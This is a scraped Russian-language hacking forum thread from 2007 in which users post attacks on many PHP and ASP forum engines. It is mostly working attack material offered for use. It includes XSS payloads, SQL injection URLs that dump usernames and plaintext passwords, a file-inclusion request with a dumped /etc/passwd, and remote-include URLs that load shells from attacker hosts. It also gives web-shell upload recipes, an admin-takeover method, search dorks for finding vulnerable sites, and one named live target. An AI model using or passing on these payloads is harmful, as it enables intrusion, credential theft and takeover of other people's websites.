 |
|

23.04.2007, 15:31
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: pHpAS
Версия: 1.26
1. Активная XSS.
1) При ответе в теме в поля Title и Name вставляем скрипт <script>alert();</script>.
Скрипт будет выполняться при про смотре коментариев.
2) При создание темы (/admin - пароль здесь не нужен) в полях Title и Text вводим <script>alert();</script>.
Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.
2. SQL инъекция.
Уязвимость в сценарие show.php в параемтре id.
Код:
http://site.ru/forum/show.php?id=-1+union+select+1,2,3,4/*
Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26
------------------------------------------------------------
------------------------------------------------------------
Форум: electrifiedForum
Версия: v1.70
1. Пасивная XSS.
Код:
http://site.ru/forum/index.php?action=displaythread&forum=chat&id=<script>alert();</script>
Есть еще одна но, она будет выполняться только с админскими привилегиями:
Код:
http://site.ru/forum/index.php?action=userinfo&user=<script>alert();</script>
2. Активная XSS.
1) В личке в поле Subject пишем <script>alert();</script>, скрипт будет выполняться при просмотре личной почты.
2) В профиле в подписе ( Signature) пишем <script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.
3) На форуме при создание темы в поле Title пишем <script>alert();</script>, скрипт будет выполняться при ответе на сообщение.
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70
Последний раз редактировалось Grey; 23.04.2007 в 18:24..
|
|
|

24.04.2007, 18:58
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: He11.net Forums
Версия: 1.0
1. Пасивная XSS.
Код:
http://site.ru/forum/index.php?top_message=<script>alert();</script>
2. SQL инъекция.
1)
Код:
http://site.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9,10,11,12+from+Dragon_users/*
в результате получаем строку вида:
1:grey: 202cb962ac59075b964b07152d234b70: 123
В базе данных хранится и зашифрованный пароль (md5) и пароль в чистом виде.
2)
Код:
http://site.ru/forum/view_thread.php?id=-1+union+select+1,2,3,4,concat(id,char(58),username,char(58),password,char(58),uncrypt_pass),6,7,8,9+from+Dragon_users/*
------------------------------------------------------------
Для поиска сайтов с таким форумом вводим: "View Today's Active Topics"
Пример уязвимого форума:
__http://sims2.h10.ru/forum/profile.php?id=-1+union+select+1,concat(id,char(58),username,char( 58),password,char(58),uncrypt_pass),3,4,5,6,7,8,9, 10,11,12+from+Dragon_users/*
------------------------------------------------------------
------------------------------------------------------------
Форум: UBB Threads
Версия: 5.5
Пассивная XSS:
Код:
http://site.ru/showprofile.php?Cat=&User=<script>alert();</script>
Активная XSS:
При создание сообщения на форуме в поле Сообщение вписываем скрипт, скрипт будет выполняться при просмотре темы.
Заливка шелла:
Заходим в админку - Includes, редактируем (вписываем шелл) любой из файлов (Header, Footer и т.д.).
Шелл будет доступен по адресу:
http://site.ru/includes/header.php
Последний раз редактировалось Grey; 14.06.2007 в 16:14..
|
|
|

24.04.2007, 22:34
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами:
10555586
Репутация:
726
|
|
Форум FastBB 9.20
1. Возможности писать в закрытые темы.
Необходимо зайти в закрытую тему, в адресной строке поменять №1 на №6 - и
попадаешь на страницу создания сообщения. Пишешь сообщение, отправляешь и оно
появляется в теме.
|
|
|

26.04.2007, 22:10
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами:
10555586
Репутация:
726
|
|
Форум: Ultimate PHP Board
Необходимо зарегестрироватся.Регестр руемся и запоминаем что мы написали.
Теперь самое интересное - использование уязвимости. Баг в форуме в том что у всех зарегестрированных пользователей есть права на просмотр файлов:
_http://www.forum.de/forum/admin.php - панель администратора.
_http://www.forum.de/forum/admin_forum.php - администрирование форумами.
_http://www.forum.de/forum/admin_members.php - позволяет редактировать пользователей.
_http://www.forum.de/forum/admin_config.php - панель настройки форума.
Идем на _http://www.forums.de/forum/admin_members.php и перед нами список пользователей. Ставим себе права админа, перезаходим, удаляем бывших админов и форум ваш! 
|
|
|

14.05.2007, 09:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
Форум: Anyboard все версии
Локальный инклуд файлов в параметре vf
Например на сайте производителя:
Код:
http://www.anyboard.net/cgi-bin/anyboard.cgi/rec/Party_and_Poultry_Information_Exchange/-=ab=-/index.html?cmd=retr&vf=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA%3D%3D
Код:
______________________________________________
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
http://www.google.ru/search?q=inurl:?cmd=retr
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
alias:x:500:500::/var/qmail/alias:/bin/bash
qmaild:x:501:500::/var/qmail:/bin/bash
qmaill:x:502:500::/var/qmail:/bin/bash
qmailp:x:503:500::/var/qmail:/bin/bash
qmailq:x:504:501::/var/qmail:/bin/bash
qmailr:x:505:501::/var/qmail:/bin/bash
qmails:x:506:501::/var/qmail:/bin/bash
vpopmail:x:507:502::/home/vpopmail:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
exim:x:93:93::/var/spool/exim:/sbin/nologin
________________________________________________
Последний раз редактировалось l1ght; 02.03.2009 в 12:38..
Причина: Rebz: хм, неплохо.. если сам нашёл..
|
|
|
XSS уязвимость на Intellect Board 2.12 |

17.05.2007, 20:46
|
|
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
С нами:
10555586
Репутация:
726
|
|
XSS уязвимость на Intellect Board 2.12
XSS уязвимость на Intellect Board 2.12
Была найдена XSS уязвимость в форумном движке Intellect Board 2.12.
Устранение: Обновить скрипты.
Уязвимость: можно в качестве адреса домашней страницы или ЖЖ поставить javascript:. А дальше - классическая XSS: перехватываем идентификатор сессии админа и влезаем в АЦ. Правда, сделать это не так уж и просто: по умолчанию там выполняется привязка сессии к HTTP_USER_AGENT, да и время жизни сессии ограничено несколькими часами.
|
|
|

29.05.2007, 19:20
|
|
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами:
10051477
Репутация:
136
|
|
ExBB
Описание:Баг из-за недостаточной проверки подключаемых файлов в скрипте usertstop.php
Эксплоит : http://sitename.com/[Script Path]/modules/userstop/userstop.php?exbb[home_path]=http://yourshell
VistaBB <= 2.x
Описание:Баг в проверке передаваемого юзером поля Cookie в HTTP-запросе
Позволяет выполнять произвольные команды
Эксплоит : http://milw0rm.com/exploits/2251
Woltlab Burning Board 2.3.5
Описание:Баг в модуле links.php приводит к выполнению произвольных sql-запросов
Эксплоит : http://milw0rm.com/exploits/2197
Эксплоит : http://milw0rm.com/exploits/1810
MiniBB <=1.5
Описание:Через уязвимый скрипт com_minibb.php можно загрузить шелл на уязвимую машину
Эксплоит : http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
MyBB < 1.1.3
Описание:Эксплоит позволяет выполнять произвольные команды на сервера
Эксплоит :http://milw0rm.com/exploits/1909
PHORUM 5
Описание:Эксплоит работает с register_globals=On и magic_quotes_gpc=Off
Эксплоит : http://milw0rm.com/exploits/2008
UBB Threads
1.UBBThreads 5.x,6.x
Описание:Работает с register_globals on
Уязвимый скрипт ubbt.inc.php позволяет просматривать файлы на сервере
2.UBB.threads >= 6.4.x
Описание:Баг в скрипте голосования позволяет выполнять произвольные команды через скрипт атакующего
Эксплоит : */addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
Zix Forum
Описание:Передаваемый параметр "layid" недостаточно проверяется в скрипте 'settings.asp' что приводит к sql-inj
Эксплоит : site.com/zix/login.asp?layid=-1%20union%20select% 201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1 ,1,J_Pass,null,null,null,null,
1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLog ins where approve=1 and '1'='1'
Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select% 201,null,null,null,1,1,1,null,1,1,J_User,null,1,1, 1,1,1,J_Pass,null,null,null,nu
ll,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20ad minLogins where approve=1 and '1'='1'
qjForum
Описание:Недостаточная обработка поля "uName" в скрипте 'member.php'
Для выполнения эксплоита надо залогиниться на форум
Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username, 0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20memb er
tinyBB <= 0.3
Описание:Ошибка в скрипте 'footers.php',позволяющая залить шелл
Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
FunkBoard
Описание:Уязвимость в скрипте profile.php позволяет сменить пасс выбранного юзера
Эксплоит : http://milw0rm.com/exploits/1875
QBoard <= v.1.1
Описание:Ошибка в скрипте 'post.php',позволяющая залить шелл
Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]
FlashBB <= 1.1.5
Описание:Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
Эксплоит : http://milw0rm.com/exploits/1921
LiteForum 2.1.1
Описание:Эксплоит-переборщик хеша пароля
Эксплоит : http://rst.void.ru/download/r57lite211.txt
Forum Russian Board 4.2
Описание:Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
Эксплоит : http://rst.void.ru/download/r57frb.txt
OpenBB 1.0.5
Описание:SQL-иньекция через нефильтруемый параметр CID
Эксплоит : http://rst.void.ru/download/r57openbb.txt
Gravity Board X v1.1
Описание:Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
Эксплоит : http://rst.void.ru/download/r57gravity.txt
Zorum forum
Описание:выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
Эксплоит : http://rst.void.ru/download/r57zor.txt
Последний раз редактировалось Grey; 29.05.2007 в 19:35..
Причина: Удалил то, что повторяется в других темах.
|
|
|

05.06.2007, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: WR-Форум
Версия: 1.8
------------------------------------------------------------
Про уязвимости форума читать тут:
http://forum.antichat.ru/showpost.ph...51&postcount=4 - (активные XSS)
------------------------------------------------------------
Заливка шелла (через админку):
Заходим в админку -> Настройки, в поле Описание (или в поле Е-майл администратора) вписываем код шелла следующим образом:
";?> <? Код шелла ?> <? //
к примеру сделам вывод строки 123123:
";?> <? echo(123123); ?> <? //
Шелл будет доступен по адресу:
http://site.ru/forum/config.php
При внедрение кода работа форума нарушена не будет.
Последний раз редактировалось Grey; 05.06.2007 в 11:49..
|
|
|

12.06.2007, 20:11
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: VumFOrum
Версия: v2.5
Пасcивная XSS:
Код:
http://site.ru/?forum=profile&user=<script>alert();</script>
Активная XSS:
1) В поле Сообщение вводим скрипт, скрипт будет выполняться при просмотре темы.
2) При регистрации пользователя в поле Url вводим текст скрипта, скрипт будет выполняться при просмотре профиля пользователя.
Заливка шелла:
Способ 1:
При создание темы/сообщения прикрепляем файл - шелл.
Шелл будет доступен по адресу:
http://site.ru/upload/shell.php
Способ 2:
При регистрации на форуме, в поле Имя введите ../shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).
Шелл будет доступен по адресу:
http://site.ru/shell.php
Если прав на заливку шелла в эту директорию не хватит, то можно попробывать залить шелл в директорию upload:
При регистрации на форуме, в поле Имя введите ../upload/shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).
Шелл будет доступен по адресу:
http://site.ru/upload/shell.php
Последний раз редактировалось Grey; 12.06.2007 в 20:15..
|
|
|

14.06.2007, 17:59
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Форум: SMDS Forum
Версия: v.2.1 rus
Локальный инклуд:
Код:
http://site.ru/Files/all_forums.php?file_read_forums=[file]
Код:
http://site.ru/Files/write_log.php?file_read_logs=[file]
Код:
http://site.ru/Files/statistic.php?file_read_statistic=[file]
Код:
http://site.ru/Files/downloads.php?file_read_downl=[file]
http://site.ru/Files/downloads.php?file_add_downloads=[file]
Пассивные XSS:
Код:
http://site.ru/Files/buttons.php?forum_ext=1&language[but_index]=<script>alert();</script>
Код:
http://site.ru/Files/downloads.php?td_all=<script>alert();</script>
Код:
http://site.ru/Files/downloads.php?table_all=<script>alert();</script>
Код:
http://site.ru/Files/faq.php?vars[your_email]=<script>alert();</script>
Заливка шелла:
В админке, добавляем к разрешённым расширениям файлов php, закачиваем шелл, шелл будет доступен по адресу:
http://site.ru/Downloads/shell.php
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|